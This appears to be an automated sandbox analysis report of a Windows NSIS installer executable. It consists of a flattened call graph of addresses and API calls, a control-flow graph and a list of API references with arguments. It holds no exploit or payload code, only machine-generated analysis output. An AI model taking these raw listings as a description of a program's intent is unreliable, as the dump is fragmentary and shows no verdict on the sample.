3658 405aea CreateProcessW 3536->3658 3538->3536 3539->3465 3540->3467 3542 40678e 5 API calls 3541->3542 3544 4034d2 3542->3544 3543 4034dc 3543->3473 3544->3543 3665 405dd6 lstrlenW CharPrevW 3544->3665 3547 405ab5 2 API calls 3548 4034ea 3547->3548 3668 406026 3548->3668 3672 405ff7 GetFileAttributesW CreateFileW 3551->3672 3553 4030bd 3554 4030cd 3553->3554 3673 406507 lstrcpynW 3553->3673 3554->3481 3556 4030e3 3674 405e22 lstrlenW 3556->3674 3560 4030f4 GetFileSize 3575 4031ee 3560->3575 3578 40310b 3560->3578 3562 4031f7 3562->3554 3564 403227 GlobalAlloc 3562->3564 3715 4034af SetFilePointer 3562->3715 3690 4034af SetFilePointer 3564->3690 3566 40325a 3568 403019 6 API calls 3566->3568 3568->3554 3569 403210 3571 403499 ReadFile 3569->3571 3570 403242 3691 4032b4 3570->3691 3573 40321b 3571->3573 3573->3554 3573->3564 3574 403019 6 API calls 3574->3578 3679 403019 3575->3679 3576 40324e 3576->3554 3576->3576 3577 40328b SetFilePointer 3576->3577 3577->3554 3578->3554 3578->3566 3578->3574 3578->3575 3712 403499 3578->3712 3580 4068d4 5 API calls 3579->3580 3581 403bca 3580->3581 3582 403bd0 GetUserDefaultUILanguage 3581->3582 3583 403be2 3581->3583 3728 40644e wsprintfW 3582->3728 3585 4063d5 3 API calls 3583->3585 3587 403c12 3585->3587 3586 403be0 3729 403e8c 3586->3729 3588 403c31 lstrcatW 3587->3588 3589 4063d5 3 API calls 3587->3589 3588->3586 3589->3588 3592 405ede 18 API calls 3593 403c63 3592->3593 3594 403cf7 3593->3594 3596 4063d5 3 API calls 3593->3596 3595 405ede 18 API calls 3594->3595 3597 403cfd 3595->3597 3598 403c95 3596->3598 3599 403d0d LoadImageW 3597->3599 3602 406544 17 API calls 3597->3602 3598->3594 3606 403cb6 lstrlenW 3598->3606 3610 405e03 CharNextW 3598->3610 3600 403db3 3599->3600 3601 403d34 RegisterClassW 3599->3601 3605 40140b 2 API calls 3600->3605 3603 403dbd 3601->3603 3604 403d6a SystemParametersInfoW CreateWindowExW 3601->3604 3602->3599 3603->3500 3604->3600 3609 403db9 3605->3609 3607 403cc4 lstrcmpiW 3606->3607 3608 403cea 3606->3608 3607->3608 3611 403cd4 GetFileAttributesW 3607->3611 3612 405dd6 3 API calls 3608->3612 3609->3603 3615 403e8c 18 API calls 3609->3615 3613 403cb3 3610->3613 3614 403ce0 3611->3614 3616 403cf0 3612->3616 3613->3606 3614->3608 3617 405e22 2 API calls 3614->3617 3618 403dca 3615->3618 3744 406507 lstrcpynW 3616->3744 3617->3608 3620 403dd6 ShowWindow 3618->3620 3621 403e59 3618->3621 3623 406864 3 API calls 3620->3623 3737 40563c OleInitialize 3621->3737 3625 403dee 3623->3625 3624 403e5f 3626 403e63 3624->3626 3627 403e7b 3624->3627 3628 403dfc GetClassInfoW 3625->3628 3630 406864 3 API calls 3625->3630 3626->3603 3634 40140b 2 API calls 3626->3634 3629 40140b 2 API calls 3627->3629 3631 403e10 GetClassInfoW RegisterClassW 3628->3631 3632 403e26 DialogBoxParamW 3628->3632 3629->3603 3630->3628 3631->3632 3633 40140b 2 API calls 3632->3633 3633->3603 3634->3603 3635->3471 3746 406507 lstrcpynW 3636->3746 3638 405eef 3639 405e81 4 API calls 3638->3639 3640 405ef5 3639->3640 3641 4038de 3640->3641 3642 40678e 5 API calls 3640->3642 3641->3484 3650 406507 lstrcpynW 3641->3650 3645 405f05 3642->3645 3643 405f36 lstrlenW 3644 405f41 3643->3644 3643->3645 3646 405dd6 3 API calls 3644->3646 3645->3641 3645->3643 3649 405e22 2 API calls 3645->3649 3747 40683d FindFirstFileW 3645->3747 3648 405f46 GetFileAttributesW 3646->3648 3648->3641 3649->3643 3650->3519 3651->3488 3652->3525 3653->3536 3655 4062e8 3654->3655 3656 4062db 3654->3656 3655->3536 3750 40614d 3656->3750 3659 405b29 3658->3659 3660 405b1d CloseHandle 3658->3660 3659->3536 3660->3659 3662 405b7c 3661->3662 3663 403a40 ExitProcess 3662->3663 3664 405b90 MessageBoxIndirectW 3662->3664 3664->3663 3666 405df2 lstrcatW 3665->3666 3667 4034e4 3665->3667 3666->3667 3667->3547 3669 406033 GetTickCount GetTempFileNameW 3668->3669 3670 4034f5 3669->3670 3671 406069 3669->3671 3670->3473 3671->3669 3671->3670 3672->3553 3673->3556 3675 405e30 3674->3675 3676 4030e9 3675->3676 3677 405e36 CharPrevW 3675->3677 3678 406507 lstrcpynW 3676->3678 3677->3675 3677->3676 3678->3560 3680 403022 3679->3680 3681 40303a 3679->3681 3682 403032 3680->3682 3683 40302b DestroyWindow 3680->3683 3684 403042 3681->3684 3685 40304a GetTickCount 3681->3685 3682->3562 3683->3682 3686 406910 2 API calls 3684->3686 3687 403058 CreateDialogParamW ShowWindow 3685->3687 3688 40307b 3685->3688 3689 403048 3686->3689 3687->3688 3688->3562 3689->3562 3690->3570 3692 4032cd 3691->3692 3693 4032f8 3692->3693 3725 4034af SetFilePointer 3692->3725 3695 403499 ReadFile 3693->3695 3696 403303 3695->3696 3697 403423 3696->3697 3698 403315 GetTickCount 3696->3698 3699 403439 3696->3699 3697->3576 3704 403328 3698->3704 3700 40343d 3699->3700 3705 403455 3699->3705 3701 403499 ReadFile 3700->3701 3701->3697 3702 403499 ReadFile 3702->3705 3703 403499 ReadFile 3703->3704 3704->3697 3704->3703 3708 40338e GetTickCount 3704->3708 3709 4033b7 MulDiv wsprintfW 3704->3709 3716 406a4f 3704->3716 3723 4060a9 WriteFile 3704->3723 3705->3697 3705->3702 3706 4060a9 WriteFile 3705->3706 3706->3705 3708->3704 3710 405569 24 API calls 3709->3710 3710->3704 3726 40607a ReadFile 3712->3726 3715->3569 3717 406a74 3716->3717 3720 406a7c 3716->3720 3717->3704 3718 406b03 GlobalFree 3719 406b0c GlobalAlloc 3718->3719 3719->3717 3719->3720 3720->3717 3720->3718 3720->3719 3721 406b83 GlobalAlloc 3720->3721 3722 406b7a GlobalFree 3720->3722 3721->3717 3721->3720 3722->3721 3724 4060c7 3723->3724 3724->3704 3725->3693 3727 4034ac 3726->3727 3727->3578 3728->3586 3730 403ea0 3729->3730 3745 40644e wsprintfW 3730->3745 3732 403f11 3733 403f45 18 API calls 3732->3733 3735 403f16 3733->3735 3734 403c41 3734->3592 3735->3734 3736 406544 17 API calls 3735->3736 3736->3735 3738 4044af SendMessageW 3737->3738 3741 40565f 3738->3741 3739 405686 3740 4044af SendMessageW 3739->3740 3742 405698 OleUninitialize 3740->3742 3741->3739 3743 401389 2 API calls 3741->3743 3742->3624 3743->3741 3744->3594 3745->3732 3746->3638 3748 406853 FindClose 3747->3748 3749 40685e 3747->3749 3748->3749 3749->3645 3751 4061a3 GetShortPathNameW 3750->3751 3752 40617d 3750->3752 3754 4062c2 3751->3754 3755 4061b8 3751->3755 3777 405ff7 GetFileAttributesW CreateFileW 3752->3777 3754->3655 3755->3754 3757 4061c0 wsprintfA 3755->3757 3756 406187 CloseHandle GetShortPathNameW 3756->3754 3758 40619b 3756->3758 3759 406544 17 API calls 3757->3759 3758->3751 3758->3754 3760 4061e8 3759->3760 3778 405ff7 GetFileAttributesW CreateFileW 3760->3778 3762 4061f5 3762->3754 3763 406204 GetFileSize GlobalAlloc 3762->3763 3764 406226 3763->3764 3765 4062bb CloseHandle 3763->3765 3766 40607a ReadFile 3764->3766 3765->3754 3767 40622e 3766->3767 3767->3765 3779 405f5c lstrlenA 3767->3779 3770 406245 lstrcpyA 3775 406267 3770->3775 3771 406259 3772 405f5c 4 API calls 3771->3772 3772->3775 3773 40629e SetFilePointer 3774 4060a9 WriteFile 3773->3774 3776 4062b4 GlobalFree 3774->3776 3775->3773 3776->3765 3777->3756 3778->3762 3780 405f9d lstrlenA 3779->3780 3781 405fa5 3780->3781 3782 405f76 lstrcmpiA 3780->3782 3781->3770 3781->3771 3782->3781 3783 405f94 CharNextA 3782->3783 3783->3780 4409 401b77 4410 402da6 17 API calls 4409->4410 4411 401b7e 4410->4411 4412 402d84 17 API calls 4411->4412 4413 401b87 wsprintfW 4412->4413 4414 402c2a 4413->4414 4415 40167b 4416 402da6 17 API calls 4415->4416 4417 401682 4416->4417 4418 402da6 17 API calls 4417->4418 4419 40168b 4418->4419 4420 402da6 17 API calls 4419->4420 4421 401694 MoveFileW 4420->4421 4422 4016a7 4421->4422 4428 4016a0 4421->4428 4423 4022f6 4422->4423 4424 40683d 2 API calls 4422->4424 4426 4016b6 4424->4426 4425 401423 24 API calls 4425->4423 4426->4423 4427 4062c7 36 API calls 4426->4427 4427->4428 4428->4425 4429 406bfe 4430 406a82 4429->4430 4431 4073ed 4430->4431 4432 406b03 GlobalFree 4430->4432 4433 406b0c GlobalAlloc 4430->4433 4434 406b83 GlobalAlloc 4430->4434 4435 406b7a GlobalFree 4430->4435 4432->4433 4433->4430 4433->4431 4434->4430 4434->4431 4435->4434 4436 4022ff 4437 402da6 17 API calls 4436->4437 4438 402305 4437->4438 4439 402da6 17 API calls 4438->4439 4440 40230e 4439->4440 4441 402da6 17 API calls 4440->4441 4442 402317 4441->4442 4443 40683d 2 API calls 4442->4443 4444 402320 4443->4444 4445 402331 lstrlenW lstrlenW 4444->4445 4446 402324 4444->4446 4448 405569 24 API calls 4445->4448 4447 405569 24 API calls 4446->4447 4450 40232c 4446->4450 4447->4450 4449 40236f SHFileOperationW 4448->4449 4449->4446 4449->4450 4451 401000 4452 401037 BeginPaint GetClientRect 4451->4452 4453 40100c DefWindowProcW 4451->4453 4455 4010f3 4452->4455 4456 401179 4453->4456 4457 401073 CreateBrushIndirect FillRect DeleteObject 4455->4457 4458 4010fc 4455->4458 4457->4455 4459 401102 CreateFontIndirectW 4458->4459 4460 401167 EndPaint 4458->4460 4459->4460 4461 401112 6 API calls 4459->4461 4460->4456 4461->4460 4462 401d81 4463 401d94 GetDlgItem 4462->4463 4464 401d87 4462->4464 4466 401d8e 4463->4466 4465 402d84 17 API calls 4464->4465 4465->4466 4467 401dd5 GetClientRect LoadImageW SendMessageW 4466->4467 4468 402da6 17 API calls 4466->4468 4470 401e33 4467->4470 4472 401e3f 4467->4472 4468->4467 4471 401e38 DeleteObject 4470->4471 4470->4472 4471->4472 4473 401503 4474 40151e 4473->4474 4475 40150b 4473->4475 4476 402d84 17 API calls 4475->4476 4476->4474 4477 402383 4478 40238a 4477->4478 4480 40239d 4477->4480 4479 406544 17 API calls 4478->4479 4481 402397 4479->4481 4482 405b67 MessageBoxIndirectW 4481->4482 4482->4480 4483 402c05 SendMessageW 4484 402c2a 4483->4484 4485 402c1f InvalidateRect 4483->4485 4485->4484 4493 40248a 4494 402da6 17 API calls 4493->4494 4495 40249c 4494->4495 4496 402da6 17 API calls 4495->4496 4497 4024a6 4496->4497 4510 402e36 4497->4510 4500 40292e 4501 4024de 4503 4024ea 4501->4503 4505 402d84 17 API calls 4501->4505 4502 402da6 17 API calls 4504 4024d4 lstrlenW 4502->4504 4506 402509 RegSetValueExW 4503->4506 4507 4032b4 35 API calls 4503->4507 4504->4501 4505->4503 4508 40251f RegCloseKey 4506->4508 4507->4506 4508->4500 4511 402e51 4510->4511 4514 4063a2 4511->4514 4515 4063b1 4514->4515 4516 4063bc RegCreateKeyExW 4515->4516 4517 4024b6 4515->4517 4516->4517 4517->4500 4517->4501 4517->4502 4518 40290b 4519 402da6 17 API calls 4518->4519 4520 402912 FindFirstFileW 4519->4520 4521 40293a 4520->4521 4524 402925 4520->4524 4526 40644e wsprintfW 4521->4526 4523 402943 4527 406507 lstrcpynW 4523->4527 4526->4523 4527->4524 4528 40190c 4529 401943 4528->4529 4530 402da6 17 API calls 4529->4530 4531 401948 4530->4531 4532 405c13 67 API calls 4531->4532 4533 401951 4532->4533 4534 40490d 4535 404943 4534->4535 4536 40491d 4534->4536 4538 4044ca 8 API calls 4535->4538 4537 404463 18 API calls 4536->4537 4539 40492a SetDlgItemTextW 4537->4539 4540 40494f 4538->4540 4539->4535 4541 40190f 4542 402da6 17 API calls 4541->4542 4543 401916 4542->4543 4544 405b67 MessageBoxIndirectW 4543->4544 4545 40191f 4544->4545 4546 401491 4547 405569 24 API calls 4546->4547 4548 401498 4547->4548 4549 402891 4550 402898 4549->4550 4551 402ba9 4549->4551 4552 402d84 17 API calls 4550->4552 4553 40289f 4552->4553 4554 4028ae SetFilePointer 4553->4554 4554->4551 4555 4028be 4554->4555 4557 40644e wsprintfW 4555->4557 4557->4551 3313 401f12 3314 402da6 17 API calls 3313->3314 3315 401f18 3314->3315 3316 402da6 17 API calls 3315->3316 3317 401f21 3316->3317 3318 402da6 17 API calls 3317->3318 3319 401f2a 3318->3319 3320 402da6 17 API calls 3319->3320 3321 401f33 3320->3321 3322 401423 24 API calls 3321->3322 3323 401f3a 3322->3323 3330 405b2d ShellExecuteExW 3323->3330 3325 401f82 3326 40292e 3325->3326 3331 40697f WaitForSingleObject 3325->3331 3328 401f9f CloseHandle 3328->3326 3330->3325 3332 406999 3331->3332 3333 4069ab GetExitCodeProcess 3332->3333 3336 406910 3332->3336 3333->3328 3337 40692d PeekMessageW 3336->3337 3338 406923 DispatchMessageW 3337->3338 3339 40693d WaitForSingleObject 3337->3339 3338->3337 3339->3332 4558 402f93 4559 402fa5 SetTimer 4558->4559 4560 402fbe 4558->4560 4559->4560 4561 403013 4560->4561 4562 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4560->4562 4562->4561 4563 401d17 4564 402d84 17 API calls 4563->4564 4565 401d1d IsWindow 4564->4565 4566 401a20 4565->4566 4567 404599 lstrcpynW lstrlenW 3833 401b9b 3834 401ba8 3833->3834 3835 401bec 3833->3835 3841 401c31 3834->3841 3842 401bbf 3834->3842 3836 401bf1 3835->3836 3837 401c16 GlobalAlloc 3835->3837 3846 40239d 3836->3846 3852 406507 lstrcpynW 3836->3852 3839 406544 17 API calls 3837->3839 3838 406544 17 API calls 3840 402397 3838->3840 3839->3841 3848 405b67 MessageBoxIndirectW 3840->3848 3841->3838 3841->3846 3853 406507 lstrcpynW 3842->3853 3845 401c03 GlobalFree 3845->3846 3847 401bce 3854 406507 lstrcpynW 3847->3854 3848->3846 3850 401bdd 3855 406507 lstrcpynW 3850->3855 3852->3845 3853->3847 3854->3850 3855->3846 4568 40261c 4569 402da6 17 API calls 4568->4569 4570 402623 4569->4570 4573 405ff7 GetFileAttributesW CreateFileW 4570->4573 4572 40262f 4573->4572 4581 40149e 4582 4014ac PostQuitMessage 4581->4582 4583 40239d 4581->4583 4582->4583 4584 40259e 4594 402de6 4584->4594 4587 402d84 17 API calls 4588 4025b1 4587->4588 4589 4025d9 RegEnumValueW 4588->4589 4590 4025cd RegEnumKeyW 4588->4590 4592 40292e 4588->4592 4591 4025ee RegCloseKey 4589->4591 4590->4591 4591->4592 4595 402da6 17 API calls 4594->4595 4596 402dfd 4595->4596 4597 406374 RegOpenKeyExW 4596->4597 4598 4025a8 4597->4598 4598->4587 4599 404622 4600 40463a 4599->4600 4604 404754 4599->4604 4605 404463 18 API calls 4600->4605 4601 4047be 4602 404888 4601->4602 4603 4047c8 GetDlgItem 4601->4603 4608 4044ca 8 API calls 4602->4608 4609 4047e2 4603->4609 4610 404849 4603->4610 4604->4601 4604->4602 4606 40478f GetDlgItem SendMessageW 4604->4606 4607 4046a1 4605->4607 4632 404485 KiUserCallbackDispatcher 4606->4632 4612 404463 18 API calls 4607->4612 4613 404883 4608->4613 4609->4610 4614 404808 SendMessageW LoadCursorW SetCursor 4609->4614 4610->4602 4615 40485b 4610->4615 4619 4046ae CheckDlgButton 4612->4619 4633 4048d1 4614->4633 4616 404871 4615->4616 4617 404861 SendMessageW 4615->4617 4616->4613 4621 404877 SendMessageW 4616->4621 4617->4616 4618 4047b9 4622 4048ad SendMessageW 4618->4622 4630 404485 KiUserCallbackDispatcher 4619->4630 4621->4613 4622->4601 4625 4046cc GetDlgItem 4631 404498 SendMessageW 4625->4631 4627 4046e2 SendMessageW 4628 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4627->4628 4629 4046ff GetSysColor 4627->4629 4628->4613 4629->4628 4630->4625 4631->4627 4632->4618 4636 405b2d ShellExecuteExW 4633->4636 4635 404837 LoadCursorW SetCursor 4635->4610 4636->4635 4637 4015a3 4638 402da6 17 API calls 4637->4638 4639 4015aa SetFileAttributesW 4638->4639 4640 4015bc 4639->4640 4641 401fa4 4642 402da6 17 API calls 4641->4642 4643 401faa 4642->4643 4644 405569 24 API calls 4643->4644 4645 401fb4 4644->4645 4646 405aea 2 API calls 4645->4646 4647 401fba 4646->4647 4648 401fdd CloseHandle 4647->4648 4650 40697f 5 API calls 4647->4650 4652 40292e 4647->4652 4648->4652 4651 401fcf 4650->4651 4651->4648 4654 40644e wsprintfW 4651->4654 4654->4648 3784 4056a8 3785 405852 3784->3785 3786 4056c9 GetDlgItem GetDlgItem GetDlgItem 3784->3786 3788 405883 3785->3788 3789 40585b GetDlgItem CreateThread FindCloseChangeNotification 3785->3789 3829 404498 SendMessageW 3786->3829 3791 4058ae 3788->3791 3792 4058d3 3788->3792 3793 40589a ShowWindow ShowWindow 3788->3793 3789->3788 3832 40563c 5 API calls 3789->3832 3790 405739 3795 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3790->3795 3794 40590e 3791->3794 3797 4058c2 3791->3797 3798 4058e8 ShowWindow 3791->3798 3799 4044ca 8 API calls 3792->3799 3831 404498 SendMessageW 3793->3831 3794->3792 3804 40591c SendMessageW 3794->3804 3802 405792 SendMessageW SendMessageW 3795->3802 3803 4057ae 3795->3803 3805 40443c SendMessageW 3797->3805 3800 405908 3798->3800 3801 4058fa 3798->3801 3806 4058e1 3799->3806 3808 40443c SendMessageW 3800->3808 3807 405569 24 API calls 3801->3807 3802->3803 3809 4057c1 3803->3809 3810 4057b3 SendMessageW 3803->3810 3804->3806 3811 405935 CreatePopupMenu 3804->3811 3805->3792 3807->3800 3808->3794 3813 404463 18 API calls 3809->3813 3810->3809 3812 406544 17 API calls 3811->3812 3814 405945 AppendMenuW 3812->3814 3815 4057d1 3813->3815 3816 405962 GetWindowRect 3814->3816 3817 405975 TrackPopupMenu 3814->3817 3818 4057da ShowWindow 3815->3818 3819 40580e GetDlgItem SendMessageW 3815->3819 3816->3817 3817->3806 3821 405990 3817->3821 3822 4057f0 ShowWindow 3818->3822 3823 4057fd 3818->3823 3819->3806 3820 405835 SendMessageW SendMessageW 3819->3820 3820->3806 3824 4059ac SendMessageW 3821->3824 3822->3823 3830 404498 SendMessageW 3823->3830 3824->3824 3826 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3824->3826 3827 4059ee SendMessageW 3826->3827 3827->3827 3828 405a17 GlobalUnlock SetClipboardData CloseClipboard 3827->3828 3828->3806 3829->3790 3830->3819 3831->3791 4655 401a28 lstrcmpW 4656 401a1c 4655->4656 4657 40202a 4658 402da6 17 API calls 4657->4658 4659 402031 4658->4659 4660 4068d4 5 API calls 4659->4660 4661 402040 4660->4661 4662 4020cc 4661->4662 4663 40205c GlobalAlloc 4661->4663 4663->4662 4664 402070 4663->4664 4665 4068d4 5 API calls 4664->4665 4666 402077 4665->4666 4667 4068d4 5 API calls 4666->4667 4668 402081 4667->4668 4668->4662 4672 40644e wsprintfW 4668->4672 4670 4020ba 4673 40644e wsprintfW 4670->4673 4672->4670 4673->4662 4674 40252a 4675 402de6 17 API calls 4674->4675 4676 402534 4675->4676 4677 402da6 17 API calls 4676->4677 4678 40253d 4677->4678 4679 402548 RegQueryValueExW 4678->4679 4682 40292e 4678->4682 4680 40256e RegCloseKey 4679->4680 4681 402568 4679->4681 4680->4682 4681->4680 4685 40644e wsprintfW 4681->4685 4685->4680 4686 404caa 4687 404cd6 4686->4687 4688 404cba 4686->4688 4689 404d09 4687->4689 4690 404cdc SHGetPathFromIDListW 4687->4690 4697 405b4b GetDlgItemTextW 4688->4697 4692 404cf3 SendMessageW 4690->4692 4693 404cec 4690->4693 4692->4689 4695 40140b 2 API calls 4693->4695 4694 404cc7 SendMessageW 4694->4687 4695->4692 4697->4694 4698 4021aa 4699 402da6 17 API calls 4698->4699 4700 4021b1 4699->4700 4701 402da6 17 API calls 4700->4701 4702 4021bb 4701->4702 4703 402da6 17 API calls 4702->4703 4704 4021c5 4703->4704 4705 402da6 17 API calls 4704->4705 4706 4021cf 4705->4706 4707 402da6 17 API calls 4706->4707 4708 4021d9 4707->4708 4709 402218 CoCreateInstance 4708->4709 4710 402da6 17 API calls 4708->4710 4711 402237 4709->4711 4710->4709 4712 401423 24 API calls 4711->4712 4713 4022f6 4711->4713 4712->4713 4714 401a30 4715 402da6 17 API calls 4714->4715 4716 401a39 ExpandEnvironmentStringsW 4715->4716 4717 401a60 4716->4717 4718 401a4d 4716->4718 4718->4717 4719 401a52 lstrcmpW 4718->4719 4719->4717 4725 4023b2 4726 4023c0 4725->4726 4727 4023ba 4725->4727 4729 402da6 17 API calls 4726->4729 4732 4023ce 4726->4732 4728 402da6 17 API calls 4727->4728 4728->4726 4729->4732 4730 4023dc 4731 402da6 17 API calls 4730->4731 4734 4023e5 WritePrivateProfileStringW 4731->4734 4732->4730 4733 402da6 17 API calls 4732->4733 4733->4730 4742 402434 4743 402467 4742->4743 4744 40243c 4742->4744 4745 402da6 17 API calls 4743->4745 4746 402de6 17 API calls 4744->4746 4748 40246e 4745->4748 4747 402443 4746->4747 4750 402da6 17 API calls 4747->4750 4751 40247b 4747->4751 4753 402e64 4748->4753 4752 402454 RegDeleteValueW RegCloseKey 4750->4752 4752->4751 4754 402e78 4753->4754 4756 402e71 4753->4756 4754->4756 4757 402ea9 4754->4757 4756->4751 4758 406374 RegOpenKeyExW 4757->4758 4759 402ed7 4758->4759 4760 402f81 4759->4760 4761 402ee7 RegEnumValueW 4759->4761 4766 402f0a 4759->4766 4760->4756 4762 402f71 RegCloseKey 4761->4762 4761->4766 4762->4760 4763 402f46 RegEnumKeyW 4764 402f4f RegCloseKey 4763->4764 4763->4766 4765 4068d4 5 API calls 4764->4765 4768 402f5f 4765->4768 4766->4762 4766->4763 4766->4764 4767 402ea9 6 API calls 4766->4767 4767->4766 4768->4760 4769 402f63 RegDeleteKeyW 4768->4769 4769->4760 4777 401735 4778 402da6 17 API calls 4777->4778 4779 40173c SearchPathW 4778->4779 4780 401757 4779->4780 4781 401d38 4782 402d84 17 API calls 4781->4782 4783 401d3f 4782->4783 4784 402d84 17 API calls 4783->4784 4785 401d4b GetDlgItem 4784->4785 4786 402638 4785->4786 4787 4014b8 4788 4014be 4787->4788 4789 401389 2 API calls 4788->4789 4790 4014c6 4789->4790 4798 40263e 4799 402652 4798->4799 4800 40266d 4798->4800 4801 402d84 17 API calls 4799->4801 4802 402672 4800->4802 4803 40269d 4800->4803 4810 402659 4801->4810 4804 402da6 17 API calls 4802->4804 4805 402da6 17 API calls 4803->4805 4806 402679 4804->4806 4807 4026a4 lstrlenW 4805->4807 4815 406529 WideCharToMultiByte 4806->4815 4807->4810 4809 40268d lstrlenA 4809->4810 4811 4026d1 4810->4811 4812 4026e7 4810->4812 4814 4060d8 5 API calls 4810->4814 4811->4812 4813 4060a9 WriteFile 4811->4813 4813->4812 4814->4811 4815->4809

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 12 4035de 5->12 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 12->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 26 403626 21->26 26->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 39 4036c7-4036cb 36->39 40 4036cc-4036d0 36->40 44 403834-40384c DeleteFileW call 40307d 37->44 45 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->45 39->40 42 403790-40379e call 405e03 40->42 43 4036d6-4036dc 40->43 42->32 61 4037a0-4037a1 42->61 47 4036f6-40372f 43->47 48 4036de-4036e5 43->48 66 403852-403858 44->66 67 403a23-403a31 ExitProcess OleUninitialize 44->67 45->44 64 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 45->64 49 403731-403736 47->49 50 40374b-403785 47->50 54 4036e7-4036ea 48->54 55 4036ec 48->55 49->50 56 403738-403740 49->56 58 403787-40378b 50->58 59 40378d-40378f 50->59 54->47 54->55 55->47 62 403742-403745 56->62 63 403747 56->63 58->59 65 4037b0-4037bd call 406507 58->65 59->42 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 40385e-403871 call 405e03 66->71 72 4038ff-403906 call 403bb6 66->72 68 403a33-403a42 call 405b67 ExitProcess 67->68 69 403a48-403a4e 67->69 75 403a50-403a65 GetCurrentProcess OpenProcessToken 69->75 76 403ac6-403ace 69->76 88 4038c3-4038d0 71->88 89 403873-4038a8 71->89 86 40390b-40390e 72->86 83 403a96-403aa4 call 4068d4 75->83 84 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 75->84 80 403ad0 76->80 81 403ad3-403ad6 ExitProcess 76->81 80->81 98 403ab2-403abd ExitWindowsEx 83->98 99 403aa6-403ab0 83->99 84->83 86->67 91 4038d2-4038e0 call 405ede 88->91 92 403913-403927 call 405ad2 lstrcatW 88->92 90 4038aa-4038ae 89->90 94 4038b0-4038b5 90->94 95 4038b7-4038bf 90->95 91->67 107 4038e6-4038fc call 406507 * 2 91->107 105 403934-40394e lstrcatW lstrcmpiW 92->105 106 403929-40392f lstrcatW 92->106 94->95 100 4038c1 94->100 95->90 95->100 98->76 103 403abf-403ac1 call 40140b 98->103 99->98 99->103 100->88 103->76 109 403a21 105->109 110 403954-403957 105->110 106->105 107->72 109->67 112 403960 call 405ab5 110->112 113 403959-40395e call 405a38 110->113 119 403965-403975 SetCurrentDirectoryW 112->119 113->119 121 403982-4039ae call 406507 119->121 122 403977-40397d call 406507 119->122 126 4039b3-4039ce call 406544 DeleteFileW 121->126 122->121 129 4039d0-4039e0 CopyFileW 126->129 130 403a0e-403a18 126->130 129->130 131 4039e2-403a02 call 4062c7 call 406544 call 405aea 129->131 130->126 132 403a1a-403a1c call 4062c7 130->132 131->130 140 403a04-403a0b CloseHandle 131->140 132->109 140->130
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00403543
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                                                                                                                                                                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403634
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004036A0
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                                                                                                                                                                                                                                        • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
